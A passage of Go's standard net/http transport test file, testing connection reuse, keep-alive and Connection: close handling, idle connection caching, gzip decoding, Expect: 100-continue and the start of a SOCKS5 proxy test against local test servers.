Bearer authentication is an HTTP authentication scheme using Bearer tokens, so-named because it gives access to the bearer of the token. The Bearer token is a cryptic string, usually generated by the server in response to a login request. The client must send this token in the Authorization header when making requests to protected resources. After a user has been authenticated, the application validates the user’s Bearer token.
You must provide the token using HeaderBody, or Query.
This example shows you how to set the value of the authorization header as Bearer:
Authorization : Bearer cn389ncoiwuencr
If you want to send the token in the body or as a query, add access_token to your required option, for example:
{
"access_token": "eyJhb...",
"token_type": "Bearer",
"expires_in": 3600
}
Selecting JWT as the authentication method in Amplication
Support for JWT authentication is built-in to Amplication.
To select JWT authorization for your Amplication app, go to your project dashboard, select Auth Settings and choose JWT from the dropdown list.
Select JWT Authentication
Getting more information about using JWT in Amplication
For more details about using JWT in Amplication, check out the Authentication article in Amplication Docs.
Get the full story
This has been just a quick overview of JWT. If you want the full picture these other sites:
Autho - JSON Web Tokens
Wikipedia - JSON Web Token
flaviocopes - JSON Web Token (JWT) Explained
Mozilla – Authentication Schemes
JSON Web Token - IETF)
Bearer Token Usage - IETF)
ionos – JSON Web Tokens
|
__label__pos
| 0.888753 |
16.2.2. Custom LoginModule Example
The following information will help you to create a custom Login Module example that extends the UsernamePasswordLoginModule and obtains a user's password and role names from a JNDI lookup.
At the end of this section you will have created a custom JNDI context login module that will return a user's password if you perform a lookup on the context using a name of the form password/<username> (where <username> is the current user being authenticated). Similarly, a lookup of the form roles/<username> returns the requested user's roles.
Section 16.2.2, “Custom LoginModule Example” shows the source code for the JndiUserAndPass custom login module.
Note that because this extends the JBoss UsernamePasswordLoginModule, all JndiUserAndPass does is obtain the user's password and roles from the JNDI store. The JndiUserAndPass does not interact with the JAAS LoginModule operations.
Example 16.17. JndiUserAndPass Custom Login Module
package org.jboss.book.security.ex2;
import java.security.acl.Group;
import java.util.Map;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import javax.security.auth.Subject;
import javax.security.auth.callback.CallbackHandler;
import javax.security.auth.login.LoginException;
import org.jboss.security.SimpleGroup;
import org.jboss.security.SimplePrincipal;
import org.jboss.security.auth.spi.UsernamePasswordLoginModule;
/**
* An example custom login module that obtains passwords and roles
* for a user from a JNDI lookup.
*
* @author [email protected]
* @version $Revision: 1.4 $
*/
public class JndiUserAndPass
extends UsernamePasswordLoginModule
{
/** The JNDI name to the context that handles the password/username lookup */
private String userPathPrefix;
/** The JNDI name to the context that handles the roles/ username lookup */
private String rolesPathPrefix;
/**
* Override to obtain the userPathPrefix and rolesPathPrefix options.
*/
public void initialize(Subject subject, CallbackHandler callbackHandler,
Map sharedState, Map options)
{
super.initialize(subject, callbackHandler, sharedState, options);
userPathPrefix = (String) options.get("userPathPrefix");
rolesPathPrefix = (String) options.get("rolesPathPrefix");
}
/**
* Get the roles the current user belongs to by querying the
* rolesPathPrefix + '/' + super.getUsername() JNDI location.
*/
protected Group[] getRoleSets() throws LoginException
{
try {
InitialContext ctx = new InitialContext();
String rolesPath = rolesPathPrefix + '/' + super.getUsername();
String[] roles = (String[]) ctx.lookup(rolesPath);
Group[] groups = {new SimpleGroup("Roles")};
log.info("Getting roles for user="+super.getUsername());
for(int r = 0; r < roles.length; r ++) {
SimplePrincipal role = new SimplePrincipal(roles[r]);
log.info("Found role="+roles[r]);
groups[0].addMember(role);
}
return groups;
} catch(NamingException e) {
log.error("Failed to obtain groups for
user="+super.getUsername(), e);
throw new LoginException(e.toString(true));
}
}
/**
* Get the password of the current user by querying the
* userPathPrefix + '/' + super.getUsername() JNDI location.
*/
protected String getUsersPassword()
throws LoginException
{
try {
InitialContext ctx = new InitialContext();
String userPath = userPathPrefix + '/' + super.getUsername();
log.info("Getting password for user="+super.getUsername());
String passwd = (String) ctx.lookup(userPath);
log.info("Found password="+passwd);
return passwd;
} catch(NamingException e) {
log.error("Failed to obtain password for
user="+super.getUsername(), e);
throw new LoginException(e.toString(true));
}
}
}
The details of the JNDI store are found in the org.jboss.book.security.ex2.service.JndiStore MBean. This service binds an ObjectFactory that returns a javax.naming.Context proxy into JNDI. The proxy handles lookup operations done against it by checking the prefix of the lookup name against password and roles.
When the name begins with password, a user's password is being requested. When the name begins with roles the user's roles are being requested. The example implementation always returns a password of theduke and an array of roles names equal to {"TheDuke", "Echo"} regardless of what the user name is. You can experiment with other implementations as you wish.
The example code includes a simple session bean for testing the custom login module. To build, deploy and run the example, execute the following command in the examples directory.
[examples]$ ant -Dchap=security -Dex=2 run-example
...
run-example2:
[echo] Waiting for 5 seconds for deploy...
[java] [INFO,ExClient] Login with user name=jduke, password=theduke
[java] [INFO,ExClient] Looking up EchoBean2
[java] [INFO,ExClient] Created Echo
[java] [INFO,ExClient] Echo.echo('Hello') = Hello
The choice of using the JndiUserAndPass custom login module for the server side authentication of the user is determined by the login configuration for the example security domain. The EJB JAR META-INF/jboss.xml descriptor sets the security domain.
<?xml version="1.0"?>
<jboss>
<security-domain>security-ex2</security-domain>
</jboss>
The SAR META-INF/login-config.xml descriptor defines the login module configuration.
<application-policy name = "security-ex2">
<authentication>
<login-module code="org.jboss.book.security.ex2.JndiUserAndPass" flag="required">
<module-option name="userPathPrefix">/security/store/password</module-option>
<module-option name = "rolesPathPrefix">/security/store/roles</module-option>
</login-module>
</authentication>
</application-policy>
|
__label__pos
| 0.954032 |
Take the 2-minute tour ×
Stack Overflow is a question and answer site for professional and enthusiast programmers. It's 100% free, no registration required.
I am using Play 2.1.1 with Scala. I want to be able to serialize an object into a single value so that I can toss them into a list and have it output an array of this object. I only want it to output entry.document.
import play.api.db._
import anorm._
import anorm.SqlParser._
import play.api.Play.current
import java.sql.ResultSet
import play.api.libs.json._
import play.api.libs.json.Json.toJson
import play.api.libs.functional.syntax._
import play.api.libs.json.JsValue
implicit val searchEntryWrites = new Writes[SearchEntry] {
def writes(entry: SearchEntry): JsValue = {
Json.obj(
toJson(entry.document)
)
}
}
entry.document is actually already JSON. I have figured out how to get this to compile but the output is escaped json instead of just json. Any thoughts?
share|improve this question
What's the type of SearchEntry.document? Or, could you add the definition of SearchEntry to your question? Just the (case) class, not the companion object (if you have one). – Carsten May 16 '13 at 21:52
Could you also include the imports and what the compiler exception is too? – cmbaxter May 17 '13 at 0:15
1 Answer 1
Not sure if you can do it like that without first parsing the values with the play JSON library, so that you will have a JSObject representation of the json in entry.document.
Maybe it would be better to not parse it and just build the JSON string yourself in this case? Something like:
Ok("[" + entries.mkString(",") + "]").as("text/json")
share|improve this answer
Your Answer
discard
By posting your answer, you agree to the privacy policy and terms of service.
Not the answer you're looking for? Browse other questions tagged or ask your own question.
|
__label__pos
| 0.685737 |
September 10, 2024
Short Message Service, better known as SMS, sms gateway has transformed the way we communicate, becoming a cornerstone of modern messaging. Since its inception in the 1980s, SMS has undergone a remarkable evolution, shaping the digital landscape and revolutionizing personal and professional interactions worldwide.
The Birth of SMS
SMS traces its origins to the early 1980s when Friedhelm Hillebrand and Bernard Ghillebaert first conceptualized the idea of sending short messages over the cellular network. The concept was simple yet groundbreaking: to create a system that could transmit small, text-based messages between mobile devices.
Rapid Adoption and Global Reach
SMS was initially seen as a niche feature, with limited functionality and high costs. However, as mobile technology advanced, SMS quickly gained popularity due to its simplicity, affordability, and ease of use. By the late 1990s and early 2000s, SMS had become a ubiquitous communication tool, transcending geographical boundaries and language barriers.
The SMS Revolution
The widespread adoption of SMS had a profound impact on communication patterns and behaviors. SMS offered a convenient way to send quick messages, enabling people to stay connected in real-time. Its popularity soared, surpassing traditional methods of communication such as emails and phone calls, particularly among younger generations.
Business and Social Impact
SMS revolutionized not only personal communication but also business interactions. It provided a new channel for businesses to engage with customers, offering services such as notifications, alerts, and marketing messages. SMS also played a crucial role in emergency communications, enabling authorities to quickly disseminate important information during crises.
Challenges and Innovations
Despite its success, SMS has faced challenges, particularly from emerging messaging apps and services. These platforms offer more features, such as multimedia messaging and group chats, challenging SMS’s dominance. However, SMS remains a reliable and widely used communication tool, especially in regions with limited internet access or smartphone penetration.
Looking Ahead
As we look to the future, SMS continues to evolve, adapting to changing communication trends and technologies. Rich Communication Services (RCS) is one such evolution, offering enhanced features similar to those found in messaging apps. RCS aims to provide a more interactive and engaging messaging experience, ensuring that SMS remains relevant in an increasingly connected world.
Conclusion
From its humble beginnings to its current status as a global communication standard, SMS has come a long way. Its simplicity, affordability, and reliability have made it a mainstay of modern communication, transcending borders and connecting people around the world. As technology continues to advance, SMS will undoubtedly continue to evolve, shaping the way we communicate for years to come.
Leave a Reply
Your email address will not be published. Required fields are marked *
|
__label__pos
| 0.941463 |
[Free] 2018(July) Ensurepass Microsoft 70-532 Dumps with VCE and PDF 151-160
Ensurepass.com : Ensure you pass the IT Exams
2018 July Microsoft Official New Released 70-532
100% Free Download! 100% Pass Guaranteed!
Developing Microsoft Azure Solutions
Question No: 151 HOTSPOT – (Topic 5)
You store JSON data in a blob by using the Azure Blob service. Web applications access the JSON data by using client-side JavaScript calls.
JSON data is stored in a container that is configured to allow anonymous access. Web applications that are allowed to make updates to the data have access to any necessary shared access signatures (SASs) and storage keys.
You configure one Cross-Origin Resource Sharing (CORS) rule for the https://fabrikam.com domain and then run the following method. Line numbers are provided for reference only.
Ensurepass 2018 PDF and VCE
For each of the following statements, select Yes if the statement is true. Otherwise, select No.
Ensurepass 2018 PDF and VCE
Answer:
Ensurepass 2018 PDF and VCE
Question No: 152 – (Topic 5)
You are designing a Windows Azure application.
The application will store data in Windows Azure Blob storage. Many of the application services will be interdependent.
You need to recommend an approach for optimizing the performance of the application. What should you recommend?
1. Create one affinity group. Associate only the storage services with the affinity group.
2. Create one affinity group. Associate only the compute services with the affinity group.
3. Create one affinity group. Associate the compute services and storage services with the affinity group.
4. Create two affinity groups. Associate the compute services with one group and the storage services with the other group.
Answer: C Explanation:
Use the following procedures to create an affinity group, which can be used to direct Windows Azure storage accounts and hosted services to the same geographical grouping within a specified region. Each affinity group is associated with a Windows Azure subscription, and can be used by multiple storage accounts and hosted services for that subscription.
Affinity groups can be created and managed by the service administrator and co- administrators for a subscription.
Question No: 153 – (Topic 5)
You deploy a website to Azure. When the website starts, it loads and caches common data.
Updates to the website must occur without downtime or performance degradation that is noticeable to users.
You need to upgrade to a new version of website code.
What should you do?
Ensurepass 2018 PDF and VCE
1. Option A
2. Option B
3. Option C
4. Option D
Answer: B
Question No: 154 – (Topic 5)
Which of the following is the logical progression in internal private cloud adoption?
1. Virtualize, PaaS, IaaS and SaaS
2. SaaS, PaaS, IaaS and Virtualize
3. Virtualize, IaaS, PaaS and SaaS
4. IaaS, PaaS, Virtualize and SaaS
Answer: C Explanation:
Cloud computing service models arranged as layers in a stack.
Ensurepass 2018 PDF and VCE
References: https://en.wikipedia.org/wiki/Cloud_computing#Service_models
Question No: 155 – (Topic 5)
Which of the following statements are correct for submitting operations in a batch? (Choose three.)
1. All operations have to be in the same partition.
2. Total batch size can’t be greater than 4 MB.
3. Max operation count is 100.
4. Minimum operation count is three
Answer: A,B,C
Question No: 156 – (Topic 5)
Companies that are looking to move from capital expenses to operating expenses benefit from cloud services.
1. True
2. False
Answer: A Explanation:
quot;Capex vs. Opexquot; refers to the fact that stocking your own data center requires capital expenditure, while using an external cloud service that offers pay-as-you-go service falls into ongoing operating expenditures: thus the contrast of quot;Capex vs. Opex.quot;
References: http://www.cio.com/article/2430099/virtualization/capex-vs-opex-most- people-miss-the-point-about-cloud-economics.html
Question No: 157 – (Topic 5)
Which of the following is the cloud characteristic that speeds up development, deployment and overall time of market?
1. Rapid elasticity
2. Cloud bursting
3. Universal access
4. Network pooling
Answer: A Explanation:
Rapid elasticity is a cloud computing term for scalable provisioning, or the ability to provide scalable services. Experts point to this kind of scalable model as one of five fundamental aspects of cloud computing.
Rapid elasticity allows users to automatically request additional space in the cloud or other types of services.
References: https://www.techopedia.com/definition/29526/rapid-elasticity
Question No: 158 – (Topic 5)
Note: This question is part of a series of questions that present the same scenario. Each question in the series contains a unique solution that might meet the stated goals. Some question sets might have more than one correct solution, while others might not have a correct solution.
After you answer a question in this section, you will NOT be able to return to it. As a result, these questions will not appear in the review screen.
You deploy a Virtual Machine Scale Set (VMSS) named CorpWebVMSS to Azure by using Azure PowerShell and set the instance count to 1. The VMSS includes a storage account, load balancer, public IP address. and six Standard_A1 Windows virtual machines (VMs) that run Internet Information Services (IIS). All components are deployed to a resource group named CorpWebRG.
You must increase the instance count to support the increased load on IIS. You need to manually scale out the number of VMs in the scale set to 5.
Solution: You deploy the following JSON template by using Azure PowerShell:
Ensurepass 2018 PDF and VCE
Does the solution meet the goal?
1. Yes
2. No
Answer: A Explanation:
References:
https://docs.microsoft.com/en-us/azure/virtual-machine-scale-sets/virtual-machine-scale- sets-autoscale-overview
Question No: 159 – (Topic 5)
You administer an Access Control Service namespace named contosoACS that is used by a web application. ContosoACS currently utilizes Microsoft and Yahoo accounts.
Several users in your organization have Google accounts and would like to access the web application through ContosoACS.
You need to allow users to access the application by using their Google accounts. What should you do?
1. Register the application directly with Google.
2. Edit the existing Microsoft Account identity provider and update the realm to include Google.
3. Add a new Google identity provider.
4. Add a new WS-Federation identity provider and configure the WS-Federation metadata to point to the Google sign-in URL.
Answer: C Explanation:
Configuring Google as an identity provider eliminates the need to create and manage authentication and identity management mechanism. It helps the end user experience if there are familiar authentication procedures.
References:
http://msdn.microsoft.com/en-us/library/azure/gg185976.aspx
Question No: 160 – (Topic 5)
You are migrating an existing solution to Azure. The solution includes a user interface tier and a database tier. The user interface tier runs on multiple virtual machines (VMs). The user interface tier has a website that uses Node.js. The user interface tier has a background process that uses Python. This background process runs as a scheduled job. The user interface tier is updated frequently. The database tier uses a self-hosted MySQL database.
The user interface tier requires up to 25 CPU cores. You must be able to revert the user interface tier to a previous version if updates to the website cause technical problems. The database requires up to 50 GB of memory. The database must run in a single VM.
You need to deploy the solution to Azure. What should you do first?
1. Deploy the entire solution to an Azure website. Use a web job that runs continuously to host the database.
2. Deploy the database to a VM that runs Windows Server on the Standard tier.
3. Deploy the entire solution to an Azure website. Run the database by using the Azure data management services.
4. Deploy the user interface tier to a VM. Use multiple availability sets to continuously deploy updates from Microsoft Visual Studio Online.
Answer: C
100% Ensurepass Free Download!
Download Free Demo:70-532 Demo PDF
100% Ensurepass Free Guaranteed!
70-532 Dumps
EnsurePass ExamCollection Testking
Lowest Price Guarantee Yes No No
Up-to-Dated Yes No No
Real Questions Yes No No
Explanation Yes No No
PDF VCE Yes No No
Free VCE Simulator Yes No No
Instant Download Yes No No
Leave a Reply
Your email address will not be published. Required fields are marked *
This site uses Akismet to reduce spam. Learn how your comment data is processed.
|
__label__pos
| 0.88372 |
Error updating test.js file
Error updating test.js file
0
#1
How do i EDIT the package.json file ? Ive re-read the backend lessons and dont see it. Please advise.
ec2-user:~/workspace $ cat <package.json
{
"name": "@clear/workspace",
"version": "1.0.0",
"main": "index.js",
"scripts": {
"test": "node test.js"},
"author": "",
"license": "ISC",
"description": "",
"dependencies": {
"@linclark/pkg": "^1.0.2"}
}
ec2-user:~/workspace $ how-to-npm verify
Could not verify: SyntaxError: /home/ec2-user/workspace/package.json: Unexpected end of JSON input
at Object.parse (native)
at Object.Module._extensions…json (module.js:587:27)
at Module.load (module.js:487:32)
at tryModuleLoad (module.js:446:12)
at Function.Module._load (module.js:438:3)
at Module.require (module.js:497:17)
at require (internal/module.js:20:19)
at Object.exports.verify (/home/ec2-user/.nvm/versions/node/v6.12.3/lib/node_modules/how-to-npm/problems/06-npm-test/index.js:18:12)
at LegacyAdventure.WA.executeExercise (/home/ec2-user/.nvm/versions/node/v6.12.3/lib/node_modules/how-to-npm/node_modules/workshopper-adventure/index.js:425:16)
at LegacyAdventure.WA.process (/home/ec2-user/.nvm/versions/node/v6.12.3/lib/node_modules/how-to-npm/node_modules/workshopper-adventure/index.js:317:17)
#2
I’ve edited your post for readability. When you enter a code block into the forum, remember to precede it with a line of three backticks and follow it with a line of three backticks to make easier to read. See this post to find the backtick on your keyboard. The “preformatted text” tool in the editor (</>) will also add backticks around text.
I could be wrong, but it appears you are missing an extra } at the end.
#3
curly brace is present in code. I missed it during copy/paste
#4
If by EDIT you mean make changes to the package.json file, have you tried a text editor?
What specifically are you wanting to edit?
#5
Thank you for your help. I deleted the package.json and reinstalled it with the node test.js entered in the scripts object from the beginning then created the test.js file. Im fairly new to all this but after rereading the prior steps there is no mention of how to create a file, create a directory or how to edit text in the command line which can be troublesome for beginners like me.
Additionally the AWS cloud services site has been updated and the steps from the video do not reflect the lesson steps. This is the first lesson for the backend and not being able to follow along with the video is frustrating.
#6
Things like “how to create a file”, “how to create a directory”, and “how to edit a text file” fall under what I would consider knowing how to use your computer. Even if that was within the scope of FCC, it’s way to broad and diverse to be doable in any meaningful way.
If you want to do everything from the command line and don’t know how, most of what you’re talking about is easy to find. "How to edit a file from command line, " is not hard to Google.
#7
I agree that these don’t need to be brought up in the curriculum. A quick google search tells you all you need to know: mkdir Folder, cd Folder, nano text.txt. Also, do you not have a text editor? Why are you working in the terminal?
I’m confused. What does AWS and some video have to do with freeCodeCamp? I was not aware we even had a video tutorial for this let alone using AWS… please correct me if I’m wrong.
#8
The site the video instructions refer to has been altered because AWS bought Cloud9…
Below you’ll find a link to the lesson in question from your site.
Your’re making assumptions about beginners even knowing how to phrase a question or the jargon of the command line interface.
#9
I don’t know a lot about cloud9. What’s the reason you can’t use it now it belongs to AWS? Is it just because they want a credit card for the sign-up?
I suppose the reason there aren’t more detailed instructions for using the terminal is because Freecodecamp assumes that you’ll use cloud9 or some other IDE.
Anyway - you definitely need to know how to use an editor and the command line before you can use Node locally. VS Code is a common choice of editor - as are Atom and Brackets. You probably have at least vi and nano already installed for making simple edits but it’s easier with a more modern interface. You should find a simple introduction to using the command line for whichever OS you have and go through the basics.
|
__label__pos
| 0.753016 |
Git External merge and difftools Setting up an IntelliJ IDE as diff tool (Windows)
Example
[diff]
tool = intellij
guitool = intellij
[difftool "intellij"]
path = D:/Program Files (x86)/JetBrains/IntelliJ IDEA 2016.2/bin/idea.bat
cmd = cmd \"/C D:\\workspace\\tools\\symlink\\idea\\bin\\idea.bat diff $(cd $(dirname "$LOCAL") && pwd)/$(basename "$LOCAL") $(cd $(dirname "$REMOTE") && pwd)/$(basename "$REMOTE")\"
The one gotcha here is that this cmd property does not accept any weird characters in the path. If your IDE's install location has weird characters in it (e.g. it's installed in Program Files (x86), you'll have to create a symlink
|
__label__pos
| 0.608345 |
Handmade Hero»Forums»Code
Jesse Coyle
37 posts
Using vectors to create triangles
Hello everybody, I've been slow in my projects but on one particular note, I've had a bug that I can't find, and it must be squashed like always.
I've been using vectors to determine the points of a triangle of which to draw, I have seen a good bit of the basis part of the series and have done a min max rectangle to limit the portion of the screen to check pixels if they are inside the three vector points.
I've done several methods, checking which side the point is on relative to every vector, I've done a Barycentric method, and a couple others. The one I'm currently using seems fit as it doesn't care if the points go clockwise or counter-clockwise.
The bug comes in when it creates a weird monstrosity triangle like the one
[attachment=43]triangles.png[/attachment]. The purple squares are centered on the point where a vector point is at.
These are the three vectors that are represented by the purple squares
1
2
3
v2 test_v1 = {100, 100};
v2 test_v2 = {150, 100};
v2 test_v3 = {125, 150};
This is a method of seeing if a point is within three vector points.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
inline bool32
IsInTriangle(v2 p, v2 p0, v2 p1, v2 p2)
{
bool32 result = false;
v2 temp0 = p2 - p0;
v2 temp1 = p1 - p0;
v2 temp2 = p - p0;
float dot00 = Dot(temp0, temp0);
float dot01 = Dot(temp0, temp1);
float dot02 = Dot(temp0, temp2);
float dot11 = Dot(temp1, temp1);
float dot12 = Dot(temp1, temp2);
float inv = 1 / (dot00 * dot11 - dot01 * dot01);
float u = (dot11 * dot02 - dot01 * dot12) * inv;
float v = (dot00 * dot12 - dot01 * dot02) * inv;
result = (u >= 0) && (v >= 0) && (u + v < 1);
return result;
}
and then the triangle rendering function that writes the pixel data to the pixel buffer
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
local void
TestRender(Game_Screen_Buffer *buffer, v2 p0 , v2 p1, v2 p2,
uint8 r, uint8 g, uint8 b, uint8 a = 255)
{
float inner_min_x = Min(p0.x, p1.x);
float inner_max_x = Max(p0.x, p1.x);
float inner_min_y = Min(p0.y, p1.y);
float inner_max_y = Max(p0.y, p1.y);
float min_x = Min(inner_min_x, p2.x);
float max_x = Max(inner_max_x, p2.x);
float min_y = Min(inner_min_y, p2.y);
float max_y = Max(inner_max_y, p2.y);
if(min_x < 0.0f)
{
min_x = 0.0f;
}
if(min_y < 0.0f)
{
min_y = 0.0f;
}
if(max_x > buffer->width)
{
max_x = (float)buffer->width;
}
if(max_y > buffer->height)
{
max_y = (float)buffer->height;
}
#if 1
Rectangle(buffer, (int32)p0.x - 3, (int32)p0.y - 3, 6, 6, 255, 0, 255);
Rectangle(buffer, (int32)p1.x - 3, (int32)p1.y - 3, 6, 6, 255, 0, 255);
Rectangle(buffer, (int32)p2.x - 3, (int32)p2.y - 3, 6, 6, 255, 0, 255);
#else
Rectangle(buffer, (int32)min_x - 3, (int32)min_y - 3, 6, 6, 255, 255, 0);
Rectangle(buffer, (int32)min_x - 3, (int32)max_y - 3, 6, 6, 255, 255, 0);
Rectangle(buffer, (int32)max_x - 3, (int32)min_y - 3, 6, 6, 255, 255, 0);
Rectangle(buffer, (int32)max_x - 3, (int32)max_y - 3, 6, 6, 255, 255, 0);
#endif
uint32 blue = (uint32)b;
uint32 green = (uint32)g;
uint32 red = (uint32)r;
uint32 alpha = (uint32)a;
uint32 color = ((alpha << 24) | (red << 16) | (green << 8) | blue);
uint8 *pitch = ((uint8 *)buffer->memory +
(int32)min_x * buffer->bytes_per_pixel +
(int32)min_y * buffer->pitch);
for(float y = min_y;
y < max_y;
++y)
{
uint32 *pixel = (uint32 *)pitch;
for(float x = min_x;
x < max_x;
++x)
{
if(IsInTriangle(V2(x, y), p0, p1, p2))
{
*pixel++ = color;
}
}
pitch += buffer->pitch;
}
}
I'm not really sure whats going on honestly, I think I might have screwed up the dot products somehow, but they all look okay to me, though Any method that's worked produces the same problem so maybe It has to do with getting pixels in the pixel buffer?
Jesse Coyle
37 posts
Using vectors to create triangles
Oh sweet taco bell geezus... Screw it everyone! It was the pixel buffer...
changed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
for(float y = min_y;
y < max_y;
++y)
{
uint32 *pixel = (uint32 *)pitch;
for(float x = min_x;
x < max_x;
++x)
{
if(IsInTriangle(V2(x, y), p0, p1, p2))
{
*pixel++ = color;
}
}
pitch += buffer->pitch;
}
to
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
for(float y = min_y;
y < max_y;
++y)
{
uint32 *pixel = (uint32 *)pitch;
for(float x = min_x;
x < max_x;
++x)
{
if(IsInTriangle(V2(x, y), p0, p1, p2))
{
*pixel++ = color;
}
else
{
*pixel++;
}
}
pitch += buffer->pitch;
}
Forgot that if the condition fails you have to still move along the columns, I guess all I needed was a wookie to talk to.
[attachment=44]triangles_solution.png[/attachment]
There goes 5 hours of my life...
Andrew Bromage
183 posts / 1 project
Research engineer, resident maths nerd (Erdős number 3).
Using vectors to create triangles
Zilarrezko
I guess all I needed was a wookie to talk to.
I'm going to quote from The Practice of Programming by Kernighan and Pike. (C and Go, what a combination.)
On fixing bugs:
[An] effective technique is to explain your code to someone else. This will often cause you to explain the bug to yourself. Sometimes it takes no more than a few sentences, followed by an embarrassed “Never mind; I see what’s wrong. Sorry to bother you.” This works remarkably well; you can even use non-programmers as listeners. One university computer center kept a teddy bear near the help desk. Students with mysterious bugs were required to explain them to the teddy bear before they could speak to a human counsellor.
Many professional programmers keep some kind of toy at their desk for precisely this purpose. I have a Toy Story three-eyed alien. Anyone who has watched Chronaldragon's stream has seen his dragon. Casey, of course, doesn't need one for HMH, because he's explaining everything to the audience.
Jesse Coyle
37 posts
Using vectors to create triangles
I've heard ducks. But I thought the google wookie was the most famous one.
I bet sometimes when Casey is coding on his own, and runs into a bug. Instead of talking to his owl he instead acts as if he's explaining to window's devs how his code works and why it is better than what window's devs would have come up with, or just companies in general.
|
__label__pos
| 0.961325 |
Docker
How to Set Environment Variables in Docker
The environment variables are the variables that specify important configurational settings. The Docker environment variables help us to define additional configurations to the Docker container for deploying Docker applications such as the “USER” variable is used to specify the username, the “PASSWORD” variable is used to set the password on the application or container, or “DOCKER_HOST” to define the remote host.
This blog will demonstrate how to set environment variables in Docker using:
Method 1: Set Environment Variable Through Dockerfile
The Dockerfile is a file that defines instructions to create the Docker container’s snapshot which is also known as the Docker image. In Dockerfile, users can set the environment variables using the “ENV” command in the file. For illustration, go through the listed steps.
Step 1: Create Dockerfile
First, make the file named “Dockerfile”. Add the given code to the file:
FROM python
WORKDIR /app
COPY . /app
ENV USER="Docker-User"
CMD ["python", "app.py"]
The above snippet contains the following instructions:
• FROM” command is defining the Docker base image.
• WORKDIR” is utilized to specify the container working directory.
• COPY” command is copying the build content in the container’s defined path.
• ENV” is specifically used to set environment variables for containers. For demonstration, we have set the “USERNAME” environment variable.
• CMD” command defines the container’s executables.
Step 2: Make Python File
Next, make the Python file that will print the environment variable set in Dockerfile:
import os
user = os.environ.get("USER")
print(user)
Step 3: Make Docker Image
Generate the new Docker image/snapshot from the Dockerfile instruction through the given command:
docker build -t python-img .
Step 4: Run Docker Container
Next, execute the Docker container by executing the Docker image using the mentioned command:
docker run python-img
The output shows the “USER” environment variable value:
Method 2: Set Environment Variable Through Command
Users can also set the environment variables while creating and executing the container through the “-e” option in Docker “run” command.
For this purpose, use “docker run -e <Variable= “Value”> <image-name>” command as mentioned below:
docker run --rm -e USER="Linuxhint" python-img
In the above command, we have set the “USER” environment variable:
The above output indicates that we have successfully set the “USER” environment variable as “Linuxhint”.
Method 3: Set Environment Variable Through Compose File
The users can configure the Docker environment variables through Docker Compose. To do so, simply provide the environment variable by utilizing the Docker compose “environment” key in the “docker-compose.yml” file.
For implementation, follow the provided procedure.
Step 1: Create Compose File
First, create the “docker-compose.yml” file and add the below given configurations to the file:
version: '3'
services:
py-app:
build: .
environment:
- USER="Linuxhint"
In the above code block:
• services” is utilized to define the compose service.
• build” is providing the build context. For instance, we are using a Dockerfile placed in the currently opened directory.
• environment” key is used to set the environment variable for compose service or container.
Step 2: Fire Up the Container
Next, fire up the compose service in a container using the “docker-compose up” command:
docker-compose up
That’s all about setting up an environment variable in Docker.
Conclusion
To set the environment variable in Docker, users can use the ENV statement in Dockerfile, or the “environment” key in Docker compose. Docker users can also set the environment variable while creating and executing the container through the “docker run -e <Variable= “Value”> <image-name>” command. This post has provided the methods to set the environment variables in Docker.
About the author
Rafia Zafar
I am graduated in computer science. I am a junior technical author here and passionate about Programming and learning new technologies. I have worked in JAVA, HTML 5, CSS3, Bootstrap, and PHP.
|
__label__pos
| 0.970264 |
...
Run Format
Source file src/net/http/transport_test.go
Documentation: net/http
1 // Copyright 2011 The Go Authors. All rights reserved.
2 // Use of this source code is governed by a BSD-style
3 // license that can be found in the LICENSE file.
4
5 // Tests for transport.go.
6 //
7 // More tests are in clientserver_test.go (for things testing both client & server for both
8 // HTTP/1 and HTTP/2). This
9
10 package http_test
11
12 import (
13 "bufio"
14 "bytes"
15 "compress/gzip"
16 "context"
17 "crypto/rand"
18 "crypto/tls"
19 "crypto/x509"
20 "encoding/binary"
21 "errors"
22 "fmt"
23 "internal/nettrace"
24 "io"
25 "io/ioutil"
26 "log"
27 "net"
28 . "net/http"
29 "net/http/httptest"
30 "net/http/httptrace"
31 "net/http/httputil"
32 "net/http/internal"
33 "net/textproto"
34 "net/url"
35 "os"
36 "reflect"
37 "runtime"
38 "strconv"
39 "strings"
40 "sync"
41 "sync/atomic"
42 "testing"
43 "time"
44
45 "internal/x/net/http/httpguts"
46 )
47
48 // TODO: test 5 pipelined requests with responses: 1) OK, 2) OK, Connection: Close
49 // and then verify that the final 2 responses get errors back.
50
51 // hostPortHandler writes back the client's "host:port".
52 var hostPortHandler = HandlerFunc(func(w ResponseWriter, r *Request) {
53 if r.FormValue("close") == "true" {
54 w.Header().Set("Connection", "close")
55 }
56 w.Header().Set("X-Saw-Close", fmt.Sprint(r.Close))
57 w.Write([]byte(r.RemoteAddr))
58 })
59
60 // testCloseConn is a net.Conn tracked by a testConnSet.
61 type testCloseConn struct {
62 net.Conn
63 set *testConnSet
64 }
65
66 func (c *testCloseConn) Close() error {
67 c.set.remove(c)
68 return c.Conn.Close()
69 }
70
71 // testConnSet tracks a set of TCP connections and whether they've
72 // been closed.
73 type testConnSet struct {
74 t *testing.T
75 mu sync.Mutex // guards closed and list
76 closed map[net.Conn]bool
77 list []net.Conn // in order created
78 }
79
80 func (tcs *testConnSet) insert(c net.Conn) {
81 tcs.mu.Lock()
82 defer tcs.mu.Unlock()
83 tcs.closed[c] = false
84 tcs.list = append(tcs.list, c)
85 }
86
87 func (tcs *testConnSet) remove(c net.Conn) {
88 tcs.mu.Lock()
89 defer tcs.mu.Unlock()
90 tcs.closed[c] = true
91 }
92
93 // some tests use this to manage raw tcp connections for later inspection
94 func makeTestDial(t *testing.T) (*testConnSet, func(n, addr string) (net.Conn, error)) {
95 connSet := &testConnSet{
96 t: t,
97 closed: make(map[net.Conn]bool),
98 }
99 dial := func(n, addr string) (net.Conn, error) {
100 c, err := net.Dial(n, addr)
101 if err != nil {
102 return nil, err
103 }
104 tc := &testCloseConn{c, connSet}
105 connSet.insert(tc)
106 return tc, nil
107 }
108 return connSet, dial
109 }
110
111 func (tcs *testConnSet) check(t *testing.T) {
112 tcs.mu.Lock()
